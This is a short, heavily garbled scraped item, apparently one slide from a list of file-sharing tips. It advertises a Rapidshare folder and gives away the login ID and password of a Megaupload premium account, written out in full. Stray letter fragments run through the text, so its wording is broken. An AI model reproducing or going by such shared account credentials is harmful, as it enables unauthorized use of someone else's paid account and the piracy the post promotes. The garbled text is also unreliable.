  • 25. Visit My Rapidshare Folder (Daily Updated) i i od D yU d http://rapidshare.com/users/P0BV85 / i s re. u / 0 Here Rapidshare and Megaupload Premium Account is e R pd a ea g po r i m s Also Given for free. l re Megaupload Premium Member Account That Supports a a e o t p r Resume Downloads e Id:- cynide_2006 - y _2 Pass:- cynide_2006 s c _2 6 Cheack u will find it working Reguards Xeniumstudio h i r i R g sX nu i http://krimo666.mylivepage.com/